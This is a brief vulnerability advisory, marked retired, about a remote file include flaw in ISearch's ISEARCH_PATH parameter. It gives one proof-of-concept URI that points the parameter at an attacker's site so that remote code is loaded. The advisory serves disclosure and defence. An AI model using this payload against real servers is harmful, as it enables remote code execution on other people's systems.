• info
• discussion
• exploit
• solution
• references

RETIRED: ISearch ISEARCH_PATH Parameter Remote File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

htpp://www.example.com/[scerpitPath]/index.php?isearch_path=http://attacker's site